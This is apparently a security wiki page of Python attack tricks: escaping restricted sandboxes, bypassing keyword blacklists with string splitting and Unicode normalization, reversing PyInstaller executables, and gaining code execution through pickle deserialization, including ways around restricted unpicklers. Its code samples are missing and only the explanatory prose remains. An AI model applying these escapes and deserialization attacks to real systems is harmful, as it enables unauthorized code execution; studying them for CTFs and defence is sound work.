Python
Some tricks specific to the Python language
Last updated
Some tricks specific to the Python language
Last updated
If you find yourself in some sandbox, jail, or otherwise restricted environment there are a lot of tricks to get out of it.
Using decorators and defined lambda functions, you can execute any code without using (
or )
characters. Simply the act of defining this class will execute that code in the string:
Past Python 3.9, you can even get the same code as short as this:
Note: In the string, you can encode any other characters it doesn't accept by using \x
hex escapes
And another completely different way using method overriding, which can even be put on a single line:
The above method works because we overwrite the regular addition operator for the exec()
function object. In most built-in functions, this is not allowed and you will get a can't set attributes of built-in/extension
error. But not all built-in functions are protected like this, and a few classes exist that still allow you to overwrite their methods. You can find them all with this snippet:
It will print all the possible functions that allow method overriding:
"
quotesYou can create arbitrary strings without using a "
or '
character by using the chr()
function which takes an ASCII number:
You can generate this code by converting every character to decimal:
"
quotes or ()
parenthesesA more complicated way can be used to get strings without quotes or parentheses, using built-in strings and indexing those at specific offsets to be combined into your target string. Not all printable characters can be made in this way, but most of them can (all except '\x0c', '\t', '#', '\x0b', '\r', '?'
).
The most useful string attributes here are .__doc__
and .name
, for example, quit.name[1]
would give you 'u'
. Using a script all of these can be found, but keep in mind that the strings might differ per Python version or context.
Some tricks to bypass specific dangerous-sounding words being blacklisted.
license()
If you can set the ._Printer__filenames
attribute to the built-in license()
function you can change the function where it gets the license text data from. When you then afterward call the license()
function it will use the overwritten files instead and print the data to STDOUT.
If the "system" keyword is blacklisted for example, but you still want to execute the function for shell commands, you can try to access it using a string like "sys"+"tem"
which technically doesn't include "system" when checking the input. But while executing these get combined into the required string.
To access a function in this way, you cannot directly index it on the os
module. For these dictionary accesses, you need to access a real dictionary, not a module object. Luckily, there are methods on modules that give such a dictionary interface, like .__dict__
. If this is also blacklisted, there may be other creative ways of accessing the same function again.
Python normalizes Unicode characters for names, so they can be used if the check does not do this normalization. You can use Unicode characters to replace names that would normally be blocked. For example, the following payload does not contain the string "open" or "read":
Instead, it uses the 'Mathematical Sans-Serif Italic' (U+1D608...) characters which will normalize to ASCII letters when Python is executed (notice the slanted characters). You can create arbitrary payloads with a script like the following:
If a shorter payload (fewer bytes) is needed, you can mix and match these Unicode characters in your payload. These Unicode characters take up 4 bytes each, but you will likely only need one in your blacklisted word to bypass it, requiring the penalty once. For example, with only the first character encoded:
See this site for a table of all Unicode transformations, as this trick is far from the only one. Look for "Normalization NFKC" as Python uses it for resolving function names
When your payload is stored as a file and run, instead of just being evaluated, it is interpreted as a module. This small difference adds a possible trick using magic comments that define an encoding for the rest of the file. A list of languages can be found here, which includes odd ones like unicode_escape
, unicode_escape_raw
or utf_7
. (read writeup)
These can be abused in an AST scenario because comments are ignored while parsing, and it assumes UTF-8. With this, we can add a hidden newline after a comment to insert more code, while in UTF-8 this newline will be seen as part of the comment and is ignored while parsing the AST.
Take the following example:
This executes the id
shell command when run, while it looks like it only defines a function:
Sometimes you can abuse the environment that is sandboxing/evaluating your input, by altering it with your code. If there is a blocked
list for example, you may be able to overwrite it with an empty array to disable the filter in your next attempt. You can get creative with whatever variables you can alter to get an exploitable effect.
When it is possible to overwrite a function that will be called, a simple way out is to call the help()
function. This provides an interactive shell where you can get help pages about Python objects. When the content is sufficiently large, you will be put into a less
editor where you can scroll around, but more importantly, escape!
Note that it gives an error when you provide a string that is not a Python object like help("anything")
instead of help("str")
.
PyInstaller can create executable and shareable files from Python scripts, like Windows .exe
files or Linux ELF files. It can also be used for malware where an attacker creates a malicious Python script and compiles it to an executable they can plant somewhere with PyInstaller. That is why Reversing such a file can be very useful, and it turns out the full source code can almost flawlessly be decompiled from such a file.
First, you will want to extract the data from the PyInstaller executable. This can be done very easily using pyinstxtractor.
As the above repository shows in the example, the script generates a [name]_extracted
folder with .pyc
files. Among these files will be all the modules, and the main script. You will often have to guess what file is the main script, but the tool will also give "Possible entry points".
These .pyc
files are the compiled Python bytecode, which is not human-readable. For that, we can use uncompyle6 or pycdc to decompile this bytecode into close to the original source code.
Then you can look at the created .py
file to review all the source code.
This idea came from a combination of this writeup about PyArmor, and my own experiments.
If the code after decompiling still looks unreadable, it may be protected with an obfuscator or "packer". These try to make it harder to deobfuscate, but with some tricks, we can perform dynamic analysis to recover the code and steps after it has been decrypted at runtime.
You should be able to run the example.pyc
file with python
like you normally would, because it's simply the already-compiled version. If you get any errors involving missing .so
files, a simple solution is to just run it with LD_LIBRARY_PATH=.
as they should be in the _extracted directory.
ImportError:
libffi.so.6
: cannot open shared object file: No such file or directory
Note the specific Python version here, as the magic number might not line up with your default version. Just use apt
to install the version and possibly -distutils
of it too when using pip
.
Then after this, there still might be errors involving Python imports which should normally be included in the binary. To get these back as .pyc
files, they are simply located in the
PYZ-00.pyz_extracted
folder that was also created by pyinstxtractor
. A simple solution is to copy these files next to your main file:
This should get the binary running like normal, with the big change being that it is in its unpacked form, where we can see all the libraries. This allows us to hijack libraries by changing their code. After doing so, the mysterious main code will load our library, from which we can extract information about the calling code at runtime!
Take any library that you know the code imports, which may be one from the ImportError
s we got above. We will backup the original code, and replace it with our own:
It works! Now for the final step, we can use the inspect
module to view the call stack and find out what code called us. This code object can be disassembled to understand the bytecode:
Here, choose a frame that makes sense and looks like it should be the main code. In my case, the last [-1]
frame was the obfuscated code still, but the frame before that [-2]
was decrypted.
To go one step further, we can even forge our own .pyc
file from the codeobject, allowing decompilers like uncompyle6
or pycdc
to make readable source code from it:
Note: This trick did not work in my case, as I received strage AssertionError
s in format_RAISE_VARARGS_older
, but it may work for you
co_code
bytecodeAll functions, classes, modules etc. in Python have a __code__
attribute, which holds information about its code. This is not directly source code, but bytecode, being the optimized form that the interpreter sees without having to deal with different whitespace or variable names.
Using dis.dis()
on such an object, the disassembled bytecode is printed in a readable form. The <class 'code'>
has several parts, one of which is the raw bytecode in co_code
. This can also be disassembled with the same function, but it won't contain referenced variable names or constants. These are in co_names
+co_varnames
and co_consts
respectively, and can be combined into the final readable code Python understands. Look at this example:
From reading these attributes, we can recreate the code object from scratch and dump it into a .pyc
file like before. Then tools like uncompyle6
can decompile the bytecode back into source:
Pickle is a Python module used for serializing Python objects into raw bytes. This way they can be sent over the network, or saved in a file, and then later be deserialized to get back the original Python object.
However, there is one issue: when this deserialized data can come from the user, they can create arbitrary Python objects. This results in a classic Insecure Deserialization vulnerability, leading to Remote Code Execution.
This vulnerability has a special place in my heart, as I found it as an unintentional bug on a school assignment, and spent a lot of time and effort to try and get the most out of it. In the end, it resulted in RCE on the server, as well as on all clients that connected because the template script given was also vulnerable. You can read the whole story and learn a lot about pickle deserialization here:
The basics are that you can create a Python object that executes a system command when pickle turns it into an object. This is done with the special __reduce__()
method:
This method is called when the object is deserialized, and its return value will be what it turns into. But this return value is actually a function that will be called with the arguments provided. We can provide the function os.system
after importing it, and as the first argument give it any command we want to run.
Tip: Using exec
or eval
instead of os.system
can allow for more control over the actions your payload takes, as you can execute arbitrary Python code at the time of deserialization. Think of things like raise
to return a readable exception message
The above is often enough, but in rare cases, you might have some restrictions on what data you can send. Maybe you need to bypass some filter or a length restriction.
Pickle has evolved over time, with new protocols for better serializing of objects. Luckily, this protocol can be chosen by whoever creates the data, and the server deserializing it will simply recognize the protocol and switch accordingly.
This opens up the opportunity for a few different formats that might help in whatever filter you are trying to get through.
Using the pickletools.dis(data)
function, we can disassemble the serialized data to better understand what each byte is doing:
This PROTO
value represents the protocol used, and in the pickle.dumps
method we can simply specify protocol=
keyword argument to specify the protocol. This is a number between 0 and 5. Looking at all of these protocols the payload can get very different:
In most simple cases, protocol=1
is the shortest.
As you might have noticed above, the os.system
function turned into 'posix system'
for serialized data. This is what automatically happens when you serialize data using pickle.dumps
, but it turns out there are actually multiple ways to represent this function.
I expected to see os
instead of posix
, so I tried simply replacing posix
with os
. This turned out to actually work! The deserializer will happily decode this to the correct function and still achieves RCE. By simply replacing this text in the serialized data, you can get rid of 3 characters:
Finally, after having the shortest possible pickle data, you need a short command to receive a shell and further explore the target. In the writeup linked above, I discovered my own method to slowly write a full payload to a file and execute it in a lot of commands below 12 bytes. This was enough to bypass the 40-byte packet limit that the situation had.
As explained in the documentation, a filter can be added to the deserialization process that restricts the objects that can be imported. This is normally possible through the GLOBAL
opcode which takes a module and a class to load. This allows it to use methods from other modules and classes while deserializing, which is how it is able to deserialize any object.
As we have seen above, it allows an attacker to import dangerous modules such as os
to run commands, or builtins like exec
and eval
to execute arbitrary Python code. The filter can define its own logic for importing modules and classes with an extension like the following:
The above rules only allow classes from the random
module to be imported and some dangerous built-ins are blocked. While it may seem safe at first, it turns out that there are a lot of possibilities still to bypass a configuration like this. Great research into this has been done by @splitline who ended up creating a tool that compiles Python-like code into serialized pickle data because the opcodes are quite powerful and allow defining some simple logic (also check out the talk):
The most important pieces of syntax that it can turn into pickle are the following:
Define variables with common types like string
, number
, list
, tuple
or dict
Attribute assignment like dict_['x'] = 1337
Function calls like f(arg1, arg2)
Import modules using from module import something
syntax
Manually import more complex objects using GLOBAL("module", "path.to.something")
The next section will use the Pickora syntax to easily create pickle data, which can be compiled like so:
We will look at the example filter from above to bypass it in various general ways.
Firstly, while the allowed random
module does not contain directly dangerous functions, it imports some modules like import os as _os
. This is a property path that we can include in the GLOBAL
opcode as the name of the class, separated by .
dots. This way we can access the os
module like before, but through the random
module to bypass the filter:
Secondly, there is another module allowed named builtins
. exec
and eval
are blocked, but more dangerous functions exist in the module like __import__
to import os
again. However, we cannot just access the .system
function on it to run a command. This is not possible in pickle opcodes. Instead, we can call the builtins.getattr
function as it is also not blocked, with the property we want to access on the os
module:
Thirdly, the seemingly insignificant collections
module is also allowed to be imported from. One trick we can perform on any module is importing their .__builtins__
attribute and calling __getitem__
on it to recover a builtin like eval
:
Lastly, if we weren't allowed to use the builtins
module, or the __builtins__
attribute, we can still use any module to recover the builtins. The clever trick is to temporarily save a value as an attribute on the module using __setattr__
, to be able to access it later with another GLOBAL
opcode. We can then import the __getitem__
method on such a saved object and call it to access any dictionary key which normally wouldn't be possible in pickle opcodes. This combined with __builtins__
allows us to get back to eval
again:
Note: If you are able to import any function, you can significantly reduce the complexity of this bypass by accessing its globals and the .get()
method, like explained in this writeup
You might find a serialized piece of pickle data, but without source code, it may be difficult to understand what it exactly means. There are a few plaintext strings inside the serialized data that can give an idea of what it is about. To get a full understanding of everything some more analysis is required, but luckily there exist tools that help with this.
The pickletools
library contains useful functions for analyzing pickled data and can disassemble the opcodes to get a better understanding of the binary data:
This disassembly works with pushing and popping from the stack. This is more clear with a nested expression like (1, [2, 3])
:
Here, a 1
integer is pushed on the stack, then an empty list is pushed too. The numbers 2
and 3
are added to a "markobject" and at the end the list is extended by this slice. This leaves the integer 1
and the list on the top of the stack, which is turned into a tuple from the 2 topmost stack items using TUPLE2
.
A common opcode is MEMOIZE
, which stores the stack top in a special place for reuse later on. These can then be referenced further in the data so it does not have to be repeated.
Warning: As shown above, deserializing any pickle payload can lead to Arbitrary Code Execution, so be careful what you deserialize while reverse engineering! If you have any reason for suspicion, try it in a safe environment like a VM first.
While static analysis can give a decent idea, you can see a lot quickly when simply running the code in the pickled data. To get only the result of a deserialization, run:
You can play with the result if it is more complex in a Python console:
Some pickled data requires custom classes to be defined, which it sets properties on or initializes in other ways. These need to be defined in the context before deserializing or it will throw an error with the missing class name. if these are unknown try doing more Static Analysis
To view more of the steps involved, try following the load()
call in a debugger like VSCode, which will decompile some pieces of code visually and show intermediate variables. If a pickle object requires more steps to be created, this can give a great idea of those steps.
If you find your mystery object has functions defined (common with machine learning models), the inspect.getsource()
function may be able to recreate the source code for the function in question. The more low-level dis.dis()
function can give you disassembled bytecode instead.
However, in the meantime, I found that this problem has been explored before. Orange Tsai made a challenge where you had to achieve full RCE commands of only 4 bytes each. The solution to this challenge is explained in . This can be applied just as easily to this injection.